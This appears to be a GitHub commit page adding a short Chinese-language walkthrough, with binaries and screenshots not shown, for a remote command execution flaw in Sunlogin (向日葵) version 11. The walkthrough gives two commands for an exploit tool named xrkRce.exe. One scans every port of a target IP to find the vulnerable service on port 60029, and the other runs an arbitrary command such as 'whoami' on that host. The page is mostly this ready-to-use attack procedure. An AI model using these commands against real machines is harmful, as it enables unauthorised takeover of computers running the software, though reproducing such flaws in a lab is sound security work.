向日葵Ver 11版本远程命令执行 (#6)

This commit is contained in:
DCatSlayer 2022-02-18 13:04:56 +08:00 committed by GitHub
parent 6ba9a02edd
commit 520b5a5075
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
9 changed files with 13 additions and 0 deletions

Binary file not shown.

After

Width:  |  Height:  |  Size: 5.1 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 5.0 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 22 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 18 KiB

Binary file not shown.

Binary file not shown.

Binary file not shown.

View File

@ -0,0 +1,13 @@
向日葵版本Ver.11.0.0.33162
验证过程windows11
1. 本机安装向日葵后启动软件;
![1](1.jpg)
2. CMD输入命令扫描端口判断是否可能存在Rce xrkRce.exe -h 192.168.99.38 -t scan -p 1-65535
![2](2.jpg)
3. 可能存在会返回端口60029
![3](3.jpg)
4. CMD输入命令xrkRce.exe -h 192.168.99.38 -t rce -p 60029 -c "whoami"),发现命令执行。
![4](4.jpg)